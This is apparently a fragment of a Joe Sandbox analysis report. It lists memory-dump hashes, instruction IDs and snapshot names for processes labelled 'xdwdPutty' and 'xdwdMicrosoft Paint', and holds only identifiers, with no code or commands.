                              • String ID:
                              • API String ID:
                              • Opcode ID: a383ae794349d91bcee524fc0dcde67e6a0a2ebd3a362d04de4959e22737e946
                              • Instruction ID: 5ba93c6949723e653641edc745ece2986f3c037b43da60cc430bb410337d613b
                              • Opcode Fuzzy Hash: a383ae794349d91bcee524fc0dcde67e6a0a2ebd3a362d04de4959e22737e946
                              • Instruction Fuzzy Hash: 16D1B311D1D2878EFB66922498961BD3BE0DF16311F7909B6CD89CB2D3ED0D684B8392
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e0b6432b4ccdc92eb76959bd61c9f8579e828adcdd9f14b0be6838cf72fa2269
                              • Instruction ID: 91e37b4dedcd461d643a513b7d25da7111fe147c31c9e0f1d1244b81ed84cd6c
                              • Opcode Fuzzy Hash: e0b6432b4ccdc92eb76959bd61c9f8579e828adcdd9f14b0be6838cf72fa2269
                              • Instruction Fuzzy Hash: 32B1E521D0C686CAFBE9966888562B87BD0EF55300F74297AD84DC73D3ED5C690E83D2
                              Strings
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID: !L]H
                              • API String ID: 0-928549208
                              • Opcode ID: bb8d72cc381e8af149b85c679afb650ebf86d3d22296382813dd929aed25742e
                              • Instruction ID: 0c2bf58ff7fea98421c3d4a350f44214306e93eb790f605d78d316dc68dbe9eb
                              • Opcode Fuzzy Hash: bb8d72cc381e8af149b85c679afb650ebf86d3d22296382813dd929aed25742e
                              • Instruction Fuzzy Hash: 8D71AE26E4C5178AFB98E66898523BA33C1DF98310F640179E94EC33D3FD1CA80A4392
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dbca8ad46f2ff0ac04e1631f0bd7232a9d2eb31dad451241b0c141f20ec9cb4c
                              • Instruction ID: d4014ef7db52370e018c9ee004b2d8f0c801947b792528717db111a814120787
                              • Opcode Fuzzy Hash: dbca8ad46f2ff0ac04e1631f0bd7232a9d2eb31dad451241b0c141f20ec9cb4c
                              • Instruction Fuzzy Hash: 98524B21F5D51B8BFB94AB2890916BA36D2EF98311FA10835E40EC73D7EE3DAD424351
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8bd62d2866b92b6574b0eeae4ae5e210bb290870f6f34a29d668cd0ae086590d
                              • Instruction ID: 8e0c4d128a4028ddc1149c753152a24b96b3f48eb93f9a54db0f85d3f85925d2
                              • Opcode Fuzzy Hash: 8bd62d2866b92b6574b0eeae4ae5e210bb290870f6f34a29d668cd0ae086590d
                              • Instruction Fuzzy Hash: BFC12B21F5D50B8AFB98A76890A15BE26D3EF98311FA50839D40EC77D7EE3DAC424311
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f84de00100b879b6a44cb562fb504de29c58891eccb08dbbe63df03bd6e78187
                              • Instruction ID: b49598650e749704610032c880a3512724d599444612a29b54bf2fb2d0e4cfbc
                              • Opcode Fuzzy Hash: f84de00100b879b6a44cb562fb504de29c58891eccb08dbbe63df03bd6e78187
                              • Instruction Fuzzy Hash: 5D51AF71C2C4678AF7781668E4824F9A7C1EF55360FA64078DCAD837C7AD1C6CA642C2
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 506fc1f751835f7b32e3efeb92e08d034a510be588c66f125a50709b42f07e99
                              • Instruction ID: 1f5ad80033271066dc3d70057312699133600dbf2e2308fad113380b21da1ced
                              • Opcode Fuzzy Hash: 506fc1f751835f7b32e3efeb92e08d034a510be588c66f125a50709b42f07e99
                              • Instruction Fuzzy Hash: 29519E37E0C13A86E754BA1CB4922FA73E0EF95335F50097BCA48C62C3DE19748A8794
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ae577278908c23c7419db0b07724a51a791dadb2f4e40652e0b64eda9f697b9
                              • Instruction ID: 10922ed173817b3737bbd40e42c0d5940c842833968546a283986084d15f34d6
                              • Opcode Fuzzy Hash: 3ae577278908c23c7419db0b07724a51a791dadb2f4e40652e0b64eda9f697b9
                              • Instruction Fuzzy Hash: 3651F520A1E6838FF742A77888952B93BD1DF56300F2901B6D949C72D3ED4C684783D2
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bfb48133308cc0af60761d2aea1603d09b9937fe47936d3924f66896ab1694b
                              • Instruction ID: 0b5d277203fbf8b77dccf40713b0b5ad5f6fb43d23f11c05340f2d84d9a31657
                              • Opcode Fuzzy Hash: 2bfb48133308cc0af60761d2aea1603d09b9937fe47936d3924f66896ab1694b
                              • Instruction Fuzzy Hash: C9514D71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD40DE3252DF34A9858F81
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f84af4c9b1ae479afa8c9a08fccffc3b8e856c0329f75d982043b67847a9bcf7
                              • Instruction ID: 2f4262621e8ef84d51acb79f4e9e063b47f1be8798289b091347db4df3a9d092
                              • Opcode Fuzzy Hash: f84af4c9b1ae479afa8c9a08fccffc3b8e856c0329f75d982043b67847a9bcf7
                              • Instruction Fuzzy Hash: 49516230518A4D8FEBA8DF28D8457E977D1FF58310F14822EE84DC2396DF3499458B82
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db97041af051d1e358d401970003b50cbfe63d2964d429830926f9baa639bf91
                              • Instruction ID: db59e5416bf861faf2ec844ffabbd96795cdbd64d3e8907a93f0ae1e663d7d17
                              • Opcode Fuzzy Hash: db97041af051d1e358d401970003b50cbfe63d2964d429830926f9baa639bf91
                              • Instruction Fuzzy Hash: 86517030A18A4A8FEB68DF28C8457E977D1FF58310F54826ED84DC7396DF3899458B82
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b5148d5b37a2320606b8852747a2b3b247ebfb5c8a09f200bb8279f919564b9
                              • Instruction ID: 1b9ee6c62a81e4aceeb6a25cf30a02cc821829e689d34db17dba3090b2336275
                              • Opcode Fuzzy Hash: 2b5148d5b37a2320606b8852747a2b3b247ebfb5c8a09f200bb8279f919564b9
                              • Instruction Fuzzy Hash: 83512E71918A1C8FDB98DF58D845BE9BBF1FB58310F1082AAD40DE3256DF34A9858F81
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8b639bf06f5ab4ae2594fb39054f78fa91f03a25bbb7cea9fcb2f714a2759d9
                              • Instruction ID: 1488a3d8814cf37c5098301e167aff488227db93cefe1e4bcbe62383b78ed0a2
                              • Opcode Fuzzy Hash: d8b639bf06f5ab4ae2594fb39054f78fa91f03a25bbb7cea9fcb2f714a2759d9
                              • Instruction Fuzzy Hash: 0051F53190D6898FD756E76898556E97FF0EF4B224B1901FBD488CB2A3EE2C580BC351
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66950b5737d3051eda7885b34a212787589fbd5b7b3f9228fd8ead279c7e6941
                              • Instruction ID: b2ebc974e7e35be81e2115878d0cb7d09790232d1a0b050e673f8abf12203670
                              • Opcode Fuzzy Hash: 66950b5737d3051eda7885b34a212787589fbd5b7b3f9228fd8ead279c7e6941
                              • Instruction Fuzzy Hash: 2C41B261F1C90B8AFB58EA2C98562B973C1EF95305F640579D54EC33D7ED28F8164382
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b91874e5cbe6dc7d4345dbfb2d02bfcea616ec59e297870c8263f2a1139f45d0
                              • Instruction ID: 2bbeb885ad380da32627bf2423e18a75134883725f4dcd63603a599379d4afe3
                              • Opcode Fuzzy Hash: b91874e5cbe6dc7d4345dbfb2d02bfcea616ec59e297870c8263f2a1139f45d0
                              • Instruction Fuzzy Hash: C0515E61F1C51B87FB58BB6894966BE36C2EF98306FA10535E40DC33D7EE2CA9064352
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61014184f25478e95fe075b8341164b2d01955faeeb2419af428928a9e8e20e1
                              • Instruction ID: f0f28ac5bcb4adf703efdf3320db774f4e68ac45f7b79d0f2dce4da61fbc2b0b
                              • Opcode Fuzzy Hash: 61014184f25478e95fe075b8341164b2d01955faeeb2419af428928a9e8e20e1
                              • Instruction Fuzzy Hash: 97514A32F1C1478AFBA4AA68C0411BD27D2EF95324FA50579D94DC73C3DD2EAC664382
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c75b232930f036e29c229c9cfe39eff2394a69ff3744d243f35bbfcc6c107835
                              • Instruction ID: 3edbf3de36e187f4d507db40f83680f1f6dad5e7e11d7ca1a31b1e0f8ad68816
                              • Opcode Fuzzy Hash: c75b232930f036e29c229c9cfe39eff2394a69ff3744d243f35bbfcc6c107835
                              • Instruction Fuzzy Hash: 94418221C2C5969AF3784669F8C24FDB3C1EB55720FA5417DDCA982BC7BC1C68A642C3
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 794835501a50d9c7539517b7edddcbd2dddd8651bff58d7f28620d15e26a4119
                              • Instruction ID: bf275842f134ddb405aa786b9bc90d8617c59dda5450a77b39806f6125d0156e
                              • Opcode Fuzzy Hash: 794835501a50d9c7539517b7edddcbd2dddd8651bff58d7f28620d15e26a4119
                              • Instruction Fuzzy Hash: 5941F971E1C90ACFEBD4E76884562B977E1EF58300F641975D90ED3393EE2868098BD1
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cc141c6d0ff52555a9e1030bf6636310112908e2f9042b5e958be459b949730c
                              • Instruction ID: dd10a74e29ce332e53fdb60e650430027e6f8349ab3d44fd127ddcf188593150
                              • Opcode Fuzzy Hash: cc141c6d0ff52555a9e1030bf6636310112908e2f9042b5e958be459b949730c
                              • Instruction Fuzzy Hash: E141A301F1D51B56E68877B821661BF09E39F94302BE24834E90ED7B9FED7DAA020361
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51efd57988fcf831ac43432e7ab3b681798eb01eefb8ade8efda09b30050b494
                              • Instruction ID: d33283a1af770980a4f7a686fdef835f252363b4d28b4835e86213e8ab6781a0
                              • Opcode Fuzzy Hash: 51efd57988fcf831ac43432e7ab3b681798eb01eefb8ade8efda09b30050b494
                              • Instruction Fuzzy Hash: D3413C21F5C81BCBEB94EB2890951BA36D3EB88312BA10435D40DC33D7EE3CAC428751
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0dcff043c97c21d841be09873e3844a9d1dac6f9c94e68b5fb263c15840b9c8
                              • Instruction ID: a982e2332aa04a191d9d69a32d9a19ebd1e8320314f034bc4f57c2aef60f1100
                              • Opcode Fuzzy Hash: f0dcff043c97c21d841be09873e3844a9d1dac6f9c94e68b5fb263c15840b9c8
                              • Instruction Fuzzy Hash: 6341286188E3C24FE7A7862458256653FE0DF47215F2E41FBD98CCB1E7EA4C584E8362
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1af3733d0cbaf4caf1e7d57a2f5c7658437348186ecaef00c9da59ba67bb5a6c
                              • Instruction ID: df361a0407bf64cc062bb3503c0c03711678137a9f33889994c8c1ef00d2432c
                              • Opcode Fuzzy Hash: 1af3733d0cbaf4caf1e7d57a2f5c7658437348186ecaef00c9da59ba67bb5a6c
                              • Instruction Fuzzy Hash: 24413E31E1891E8FEB95EB6C84552BDB7E1FF98301B640179D80DD7396DE39AC428780
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a3c6272bbd21cbbeae97d7f255d0815b3b2a4542897a23a06591cbe10fbe383
                              • Instruction ID: 41c4001814751086f32b3c74818cd68be44d3230cfd6c0686c433ada53dd0ba8
                              • Opcode Fuzzy Hash: 4a3c6272bbd21cbbeae97d7f255d0815b3b2a4542897a23a06591cbe10fbe383
                              • Instruction Fuzzy Hash: F5410B31A1891ACFEB98EB6CD4556BDB3E1FF58301F6444B9D90EE33A3DE2868418750
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08446f7619fa3e11ac1952d45b124e39d800239c2cbaf9455b91091f1a2cbd81
                              • Instruction ID: d8ea9a39b5733880f6c63c8c38f76a077e889ecb0284e86b18de921ea6d2760f
                              • Opcode Fuzzy Hash: 08446f7619fa3e11ac1952d45b124e39d800239c2cbaf9455b91091f1a2cbd81
                              • Instruction Fuzzy Hash: 6731D722D4D5939EEB25A674884A4B53BD0DF66200F1A05B9D889C72D3ED1C245B4393
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5fbd24d94b5422ebbc85fe5e1a18b123dd2dd880e44345498a765f1f828541d
                              • Instruction ID: 67d8ac5bee8344477b84ecce35cf36024883482d2cc06204b56d927c6a93d939
                              • Opcode Fuzzy Hash: d5fbd24d94b5422ebbc85fe5e1a18b123dd2dd880e44345498a765f1f828541d
                              • Instruction Fuzzy Hash: CD311931A08A1C8FDF94EB68D885BEDB7F1FB58311F10416AD40EE3252DF34A9868B41
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96f39b4d60f7b2589c9d0569cdc60c5cf80176d3321ad6d4fc9943244ea13926
                              • Instruction ID: fe276f769dde927e57323fe9ce4bb1100303bafe6bd1e6a7c91e0198df49a08b
                              • Opcode Fuzzy Hash: 96f39b4d60f7b2589c9d0569cdc60c5cf80176d3321ad6d4fc9943244ea13926
                              • Instruction Fuzzy Hash: D8313E5080E3C64EE76B92744C252697FA0DF13211F2959FBC98CCA2E3ED1D581E8762
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e949286c95c4a69d9e0bba0d6056aa5d3ccbccbc51cae845a6ed9a6a3a55491f
                              • Instruction ID: 346855ccf705be1ed43e8889f4f45a6cdeab2693d6b31f32d47e43b48943677a
                              • Opcode Fuzzy Hash: e949286c95c4a69d9e0bba0d6056aa5d3ccbccbc51cae845a6ed9a6a3a55491f
                              • Instruction Fuzzy Hash: C6214865A0D3C24FE713577498A12E43FB18F53220F1A01F7D489CB5E3E91D984B8362
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6566b7749bd577d0ccd387e6b19ee39cd1ba87fa06831a6b2c868fb39c2033fc
                              • Instruction ID: fc2d4b9e20479aa1fd4e7b94e9adc892815a43a2f3723402fb803afbfff9a0c6
                              • Opcode Fuzzy Hash: 6566b7749bd577d0ccd387e6b19ee39cd1ba87fa06831a6b2c868fb39c2033fc
                              • Instruction Fuzzy Hash: E4213E76D0C55B86FBE899A8881627833D0DB64311F642A39C919D23D3FDA86A1E43C1
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2f9a25e3a434e598cc8c316c26d687c701a983223056033d8235d0e8fbd91c7
                              • Instruction ID: e8130382fa314f3eff9054371c4c524e6dc83f6ea6d57a3a6b55804b692365f3
                              • Opcode Fuzzy Hash: d2f9a25e3a434e598cc8c316c26d687c701a983223056033d8235d0e8fbd91c7
                              • Instruction Fuzzy Hash: 0D21EB31A1C81ACFEB98EB6CD4596BD73E1FF58302F640479D91DD32A3DE2868418751
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3f703e3e297808c8f163ee1660a4a4585a19f8491ad36974d9b6d18cf45a5ca
                              • Instruction ID: 8528dab635e614c3fb16d1ab7caadc98a63256de5a4249d5092efea9b3161716
                              • Opcode Fuzzy Hash: a3f703e3e297808c8f163ee1660a4a4585a19f8491ad36974d9b6d18cf45a5ca
                              • Instruction Fuzzy Hash: 64F12866C1C64B8AFB19BBA488422F93BD0DF51320F6801BDD44AC7697FD1CB54B8792
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dba635349c9d1892001c3e36b4a687fcb174f2a43c573de1ede07bf6eaad9a93
                              • Instruction ID: daa0da1a4baa6d34576dc44a39a43dec666a427901afc7f25fbde66c65cbf910
                              • Opcode Fuzzy Hash: dba635349c9d1892001c3e36b4a687fcb174f2a43c573de1ede07bf6eaad9a93
                              • Instruction Fuzzy Hash: 6EC1C821D1D3878FF76692A499561B53BE0DF52311F7909B7CC89CB2D3DD0D284A8392
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: 6d26d2fbd651ffcc343318c0533b30390f3190941407e85756797d150ef6864b
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: B7E09210F1F81B95B5A821AD2A451B932C0DB88B50F700036E80DC23C9FE8CACC34193
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 89e8dbffac9eb1eff1b59af88f4ba4967bc00b9933990585a574be1f57f03a31
                              • Instruction ID: 6dc0abe6d2dc26a015bdfbe92d11e1df7d4930ccb873c00fce9c8be200b17860
                              • Opcode Fuzzy Hash: 89e8dbffac9eb1eff1b59af88f4ba4967bc00b9933990585a574be1f57f03a31
                              • Instruction Fuzzy Hash: 5DE0DF3191C5664FE7012290F4C20F967D1EF9A320F6408B6E808CB7D3CC0DA5638389
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 608119cdfa540d69113c3b165b4ea7f381f468b0c4e438ef88c69f60d5d723ab
                              • Instruction ID: a81fb34173938297ab564d6e888c0a5234da79f6ce83c0d376295001d1b44c43
                              • Opcode Fuzzy Hash: 608119cdfa540d69113c3b165b4ea7f381f468b0c4e438ef88c69f60d5d723ab
                              • Instruction Fuzzy Hash: 38E0922190C1939FE3215360E4A85F877D2EF55320F6508BBD8489BAD3DD1D65465351
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61a67d3e561b5e842bf3d7b083f563944f8dd959fad18410d3aa5e2cd85897de
                              • Instruction ID: c28d51a76486fbdc99c23f3c0fb38aa11ded495dfc68898fbe5465375df56949
                              • Opcode Fuzzy Hash: 61a67d3e561b5e842bf3d7b083f563944f8dd959fad18410d3aa5e2cd85897de
                              • Instruction Fuzzy Hash: 05E06D32E2D93B8AFA98367892152F852D1EF48361F9908B7E80DD73D6ED1D9D814280
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfce73ff0b6922cae8812ab85b3f0a209c4d1cab48cb1d816fbbcb6801146ac8
                              • Instruction ID: a28314e47d0e0b86f50e30d77fdb89a5e5635f7f79f1289c1aad5d78c168ab1e
                              • Opcode Fuzzy Hash: dfce73ff0b6922cae8812ab85b3f0a209c4d1cab48cb1d816fbbcb6801146ac8
                              • Instruction Fuzzy Hash: 0BF06D20E1F9079AFB64A2E8C7991B616C1EF14345F744474D90B833C6DD9CBC428287
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8d9831af85add99f9c3a78856b6eccd2fb754ae9585e21e72766b3df42a370d
                              • Instruction ID: fb33e3daec935a63afeadb61dae6bb70599c16aa64ef54d5b021684b84212bbd
                              • Opcode Fuzzy Hash: b8d9831af85add99f9c3a78856b6eccd2fb754ae9585e21e72766b3df42a370d
                              • Instruction Fuzzy Hash: E6E04F01B19C4B9BE685A2B840692FD57D3FFAD20176C007AD40EC3397ED589C424345
